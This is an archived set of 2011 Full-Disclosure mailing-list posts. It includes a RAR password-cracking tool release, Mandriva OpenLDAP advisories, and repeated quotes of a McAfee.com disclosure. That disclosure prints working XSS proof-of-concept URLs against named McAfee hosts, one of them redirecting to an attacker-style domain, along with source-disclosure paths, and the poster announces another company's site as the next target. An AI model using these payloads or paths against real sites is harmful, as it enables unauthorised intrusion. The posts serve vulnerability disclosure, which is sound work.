Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
Seems like a good tool for when I can just let it run over time on a rar. Thanks Chris On Mar 29, 2011, at 3:12 PM, Nagareshwar Talekar tnagaresh...@gmail.com wrote: Hi all, We have just released new password recovery tool - RarPasswordUnlocker - FREE tool to recover the password of protected RAR files. It is created by Neeraj who is leading contributor on SecurityXploded.com For more details download visit RarPasswordUnlocker http://bit.ly/ft8i5k -- With Regards Nagareshwar Talekar http://SecurityXploded.com http://PasswordForensics.com/ http://NetCertScanner.com http://twitter.com/securityxploded ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
Read the link ( http://nagareshwar.securityxploded.com/2011/03/30/launched-rar-password-unlocker-by-neeraj/ ) It [the tool] uses brute force password recovery technique that can help you to recover not only easy but also complex passwords. But without any GPU acceleration, it will take forever to bruteforce a complex password. Use this tool instead: http://www.golubev.com/rargpu.htm _ From: Jo Galara [mailto:jogal...@gmail.com] To: full-disclosure@lists.grok.org.uk Sent: Tue, 29 Mar 2011 22:13:03 +0200 Subject: Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker How does it work? Bruteforce? On 03/29/2011 09:12 PM, Nagareshwar Talekar wrote: Hi all, We have just released new password recovery tool - RarPasswordUnlocker - FREE tool to recover the password of protected RAR files. It is created by Neeraj who is leading contributor on SecurityXploded.com For more details download visit RarPasswordUnlocker http://bit.ly/ft8i5k -- Regards, Jo Galara This e-mail and any attachments may contain confidential material for the sole use of the intended recipient. If you are not the intended recipient, please be aware that any disclosure, copying, distribution or use of this e-mail or any attachment is prohibited. If you have received this e-mail in error, please contact the sender and delete all copies. Thank you for your cooperation ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Seriously, what the fuck you are thinking, it's a newsletter or something here ? Choke on your ripped dumpshit product and die. And please, keep your release update notification bullshit for your mum, OK. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
That made my morning laugh! =)
Andrew Farmer skrev 2011-03-30 00:22:
Yes, but... well, JAD does a better job of explaining than I possibly could:
Runtime rt = Runtime.getRuntime();
String str = 7z.exe x ;
str = str + \ + _filepath + \ ;
str = str + -p\ + pwd + \ ;
str = str + -o\ + _destpath + \;
str = str + -y;
System.out.println(str);
Process p = rt.exec(str);
p.waitFor();
if (p.exitValue() == 0)
{
ret = true;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nuclear plants reach software quality levels
quote The research paper concluded that there was a roughly 10 percent chance that a tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear power plant within a 50-year span based on the most conservative assumptions. But Tokyo Electric did nothing to change its safety planning based on that study, which was presented at a nuclear engineering conference in Miami in July 2007. [1] /quote on top of it their measuring devices overflowed: quote Those levels may be higher still, but authorities say 1,000 millisieverts is the upper limit of their measuring devices. [2] /quote [1] http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329 [2] http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html# ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111
(Plzdontxssme)
On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo:
http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
[Full-disclosure] [ MDVSA-2011:055 ] openldap
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:055 http://www.mandriva.com/security/ ___ Package : openldap Date: March 30, 2011 Affected: 2009.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been identified and fixed in openldap: chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server (CVE-2011-1024). modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote attackers to cause a denial of service (daemon crash) via a relative Distinguished Name (DN) modification request (aka MODRDN operation) that contains an empty value for the OldDN field (CVE-2011-1081). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081 ___ Updated Packages: Mandriva Linux 2009.0: 83ccec2a20904df9a0ca143da248d5d9 2009.0/i586/libldap2.4_2-2.4.11-3.4mdv2009.0.i586.rpm 71b97d10738a74644373e91269eaeed6 2009.0/i586/libldap2.4_2-devel-2.4.11-3.4mdv2009.0.i586.rpm 9d8ed8fde6288f8883bb1d13344e047a 2009.0/i586/libldap2.4_2-static-devel-2.4.11-3.4mdv2009.0.i586.rpm fb3d985950e150a02e8c230a311051c3 2009.0/i586/openldap-2.4.11-3.4mdv2009.0.i586.rpm ba4a65282d12a598e1e951080a18565f 2009.0/i586/openldap-clients-2.4.11-3.4mdv2009.0.i586.rpm ed18a20fa96960cfc10034c732b56b2c 2009.0/i586/openldap-doc-2.4.11-3.4mdv2009.0.i586.rpm e68073473f08adf052cc166ea2f2c8e5 2009.0/i586/openldap-servers-2.4.11-3.4mdv2009.0.i586.rpm ff1dcd171670dbb0e84845761baec2d4 2009.0/i586/openldap-testprogs-2.4.11-3.4mdv2009.0.i586.rpm 7f9e1581e730cc69109db37dd63453ba 2009.0/i586/openldap-tests-2.4.11-3.4mdv2009.0.i586.rpm 1b9fa8641f7f41d4dd859e73170d0b34 2009.0/SRPMS/openldap-2.4.11-3.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ecf971b49682fb6637c335f2790413db 2009.0/x86_64/lib64ldap2.4_2-2.4.11-3.4mdv2009.0.x86_64.rpm df29b7188a9b48141288950b00f2d7c9 2009.0/x86_64/lib64ldap2.4_2-devel-2.4.11-3.4mdv2009.0.x86_64.rpm fbdfbe6bb56cbe74c4c35a711450ae04 2009.0/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.4mdv2009.0.x86_64.rpm 6336cf856ad3fd9cb71e69f89ae621a5 2009.0/x86_64/openldap-2.4.11-3.4mdv2009.0.x86_64.rpm 08cbb77b99ee361f06650fd04ab954c4 2009.0/x86_64/openldap-clients-2.4.11-3.4mdv2009.0.x86_64.rpm 9f1bcc61420e107387d20afcbfbda8ca 2009.0/x86_64/openldap-doc-2.4.11-3.4mdv2009.0.x86_64.rpm a23b50b362db34c35d7e206147e40d1d 2009.0/x86_64/openldap-servers-2.4.11-3.4mdv2009.0.x86_64.rpm 0726dd1f6b44f0c215a3c27644e426db 2009.0/x86_64/openldap-testprogs-2.4.11-3.4mdv2009.0.x86_64.rpm e66476117347d5c19ac64b6bf3a00484 2009.0/x86_64/openldap-tests-2.4.11-3.4mdv2009.0.x86_64.rpm 1b9fa8641f7f41d4dd859e73170d0b34 2009.0/SRPMS/openldap-2.4.11-3.4mdv2009.0.src.rpm Mandriva Enterprise Server 5: 21948fd7dce8ce2c4c8fef768cfebda2 mes5/i586/libldap2.4_2-2.4.11-3.4mdvmes5.2.i586.rpm 7857e09b074a340d74373b90900d7669 mes5/i586/libldap2.4_2-devel-2.4.11-3.4mdvmes5.2.i586.rpm 9d2e59be28483bcf3acb4ff25089a390 mes5/i586/libldap2.4_2-static-devel-2.4.11-3.4mdvmes5.2.i586.rpm 2c3d52c077a56fa832d2d4209ad46834 mes5/i586/openldap-2.4.11-3.4mdvmes5.2.i586.rpm acc2717ad2b29a7b02ba7f943ef92416 mes5/i586/openldap-clients-2.4.11-3.4mdvmes5.2.i586.rpm d3deba0317c9f52ec463928a190dec51 mes5/i586/openldap-doc-2.4.11-3.4mdvmes5.2.i586.rpm f4da14b20cccf8a3059bf512ba839fb4 mes5/i586/openldap-servers-2.4.11-3.4mdvmes5.2.i586.rpm 3c34b1a9af109ee763cb26ee7615e60c mes5/i586/openldap-testprogs-2.4.11-3.4mdvmes5.2.i586.rpm a52cf23420f23ed3d3ac84abe446ae92 mes5/i586/openldap-tests-2.4.11-3.4mdvmes5.2.i586.rpm b9bced393f520051e28a489c6d8ff9ab mes5/SRPMS/openldap-2.4.11-3.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: aa04b9b7aa03aab2ec36bf7027339ea6 mes5/x86_64/lib64ldap2.4_2-2.4.11-3.4mdvmes5.2.x86_64.rpm 7ef3c991e2bc597b527af6b1f4fbbe45 mes5/x86_64/lib64ldap2.4_2-devel-2.4.11-3.4mdvmes5.2.x86_64.rpm 978ea5eed1b8957f352503e1d1036f37 mes5/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.4mdvmes5.2.x86_64.rpm 2805cdd7f4b21269cbb7867492022743
Re: [Full-disclosure] nuclear plants reach software quality levels
Interesting...! Does that mean that there is a 100 percent risk of the same tsunami over 500 years? Is there a cycle? When was the last one? Risk would be a lot higher than 10 percent if it was, say, 300 years since the last tsunami Haven't dug at all into it, this is just a very spontaneous thought... Georgi Guninski skrev 2011-03-30 12:50: quote The research paper concluded that there was a roughly 10 percent chance that a tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear power plant within a 50-year span based on the most conservative assumptions. But Tokyo Electric did nothing to change its safety planning based on that study, which was presented at a nuclear engineering conference in Miami in July 2007. [1] /quote on top of it their measuring devices overflowed: quote Those levels may be higher still, but authorities say 1,000 millisieverts is the upper limit of their measuring devices. [2] /quote [1] http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329 [2] http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html# ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:056 ] openldap
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:056 http://www.mandriva.com/security/ ___ Package : openldap Date: March 30, 2011 Affected: 2010.0, 2010.1 ___ Problem Description: Multiple vulnerabilities has been identified and fixed in openldap: chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server (CVE-2011-1024). bind.cpp in back-ndb in OpenLDAP 2.4.x before 2.4.24 does not require authentication for the root Distinguished Name (DN), which allows remote attackers to bypass intended access restrictions via an arbitrary password (CVE-2011-1025). modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote attackers to cause a denial of service (daemon crash) via a relative Distinguished Name (DN) modification request (aka MODRDN operation) that contains an empty value for the OldDN field (CVE-2011-1081). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081 ___ Updated Packages: Mandriva Linux 2010.0: a5aa1bbb1e057c06c7a579926d166c96 2010.0/i586/libldap2.4_2-2.4.19-2.2mdv2010.0.i586.rpm 7b70f9724e632ac01ae9950ba403ee6e 2010.0/i586/libldap2.4_2-devel-2.4.19-2.2mdv2010.0.i586.rpm 414f0727313a619313742ad711204f5e 2010.0/i586/libldap2.4_2-static-devel-2.4.19-2.2mdv2010.0.i586.rpm 2706caae262f70ee3c508a7659b2046d 2010.0/i586/openldap-2.4.19-2.2mdv2010.0.i586.rpm c3e50220a700e493e25248b561e4b8e4 2010.0/i586/openldap-clients-2.4.19-2.2mdv2010.0.i586.rpm 69022a5387c098694997e349877edcf2 2010.0/i586/openldap-doc-2.4.19-2.2mdv2010.0.i586.rpm b7242509b552632e63a5dbff88f5c695 2010.0/i586/openldap-servers-2.4.19-2.2mdv2010.0.i586.rpm ecfc24a4b48b71142bfcb56618068938 2010.0/i586/openldap-testprogs-2.4.19-2.2mdv2010.0.i586.rpm 2ed3d32741f610ac8dfac3af4ae0aa9f 2010.0/i586/openldap-tests-2.4.19-2.2mdv2010.0.i586.rpm a24ee1aeff19f2532440793bc059c147 2010.0/SRPMS/openldap-2.4.19-2.2mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: e649fef25faedd26a2ce13893564bc78 2010.0/x86_64/lib64ldap2.4_2-2.4.19-2.2mdv2010.0.x86_64.rpm f41262d928682f552de272d5ca37e74a 2010.0/x86_64/lib64ldap2.4_2-devel-2.4.19-2.2mdv2010.0.x86_64.rpm defba9c212decee74be8e59910624cdf 2010.0/x86_64/lib64ldap2.4_2-static-devel-2.4.19-2.2mdv2010.0.x86_64.rpm 894f8526475ac4285740e09ddd47d114 2010.0/x86_64/openldap-2.4.19-2.2mdv2010.0.x86_64.rpm a3058348fb23cd8675a6c8ff7ee3a71e 2010.0/x86_64/openldap-clients-2.4.19-2.2mdv2010.0.x86_64.rpm 1dc37b6747bce657406d34d53356ef58 2010.0/x86_64/openldap-doc-2.4.19-2.2mdv2010.0.x86_64.rpm 67272438e2f318498b59035305832f22 2010.0/x86_64/openldap-servers-2.4.19-2.2mdv2010.0.x86_64.rpm ee723e923d9fc1e9d8d4c4031746ed42 2010.0/x86_64/openldap-testprogs-2.4.19-2.2mdv2010.0.x86_64.rpm 69102731a88f0f56ba57c2884e50 2010.0/x86_64/openldap-tests-2.4.19-2.2mdv2010.0.x86_64.rpm a24ee1aeff19f2532440793bc059c147 2010.0/SRPMS/openldap-2.4.19-2.2mdv2010.0.src.rpm Mandriva Linux 2010.1: e4d21c1d7b63e87b15b98feff9545dbe 2010.1/i586/libldap2.4_2-2.4.22-2.2mdv2010.2.i586.rpm a78754a11d32fbec86c001d5115aa462 2010.1/i586/libldap2.4_2-devel-2.4.22-2.2mdv2010.2.i586.rpm c04365b9aec2b669eae606e83445ec57 2010.1/i586/libldap2.4_2-static-devel-2.4.22-2.2mdv2010.2.i586.rpm c5c4ef75c70ad30c431967a40c9b44bd 2010.1/i586/openldap-2.4.22-2.2mdv2010.2.i586.rpm fe450ae5ad6aed49ef166a98e57fca89 2010.1/i586/openldap-clients-2.4.22-2.2mdv2010.2.i586.rpm 4b5f3f22273324c8738149aaab18ff4e 2010.1/i586/openldap-doc-2.4.22-2.2mdv2010.2.i586.rpm 02351f80d3194c01b7502f89093a6bd1 2010.1/i586/openldap-servers-2.4.22-2.2mdv2010.2.i586.rpm bae40a5c9bad9c4676c5a182048bf1b4 2010.1/i586/openldap-testprogs-2.4.22-2.2mdv2010.2.i586.rpm a29483138d46b3bf5b0cf95725a11838 2010.1/i586/openldap-tests-2.4.22-2.2mdv2010.2.i586.rpm ce7b1b69d9c6697e20cef30134912601 2010.1/SRPMS/openldap-2.4.22-2.2mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: afc9a2923eff6a9323f7880f47a286ab 2010.1/x86_64/lib64ldap2.4_2-2.4.22-2.2mdv2010.2.x86_64.rpm b3474f085ea699e469b6052fb9ea8ef9 2010.1/x86_64/lib64ldap2.4_2-devel-2.4.22-2.2mdv2010.2.x86_64.rpm f5c33620b65d7cd30458cf8ec2363551
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
On Wed, Mar 30, 2011 at 2:57 PM, Cal Leeming c...@foxwhisper.co.uk wrote:
?
On Wed, Mar 30, 2011 at 1:49 PM, Benji m...@b3nji.com wrote:
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111
(Plzdontxssme)
On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(
http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com
).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:
http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:
http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:
http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:
http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:
http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:
http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:
http://download.mcafee.com/common/ssi/variables.asp
view-source:
http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:
http://download.mcafee.com/common/ssi/errHandler.asp
view-source:
http://download.mcafee.com/common/ssi/common_subs.asp
view-source:
http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:
http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo:
http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed:
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
It is still available at http://insectpro.highprofilesite.com/ Free, no donation required. Quentin 2011/3/30 runlvl run...@gmail.com: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We’re always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community! Get it now from: http://www.insecurityresearch.com Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: 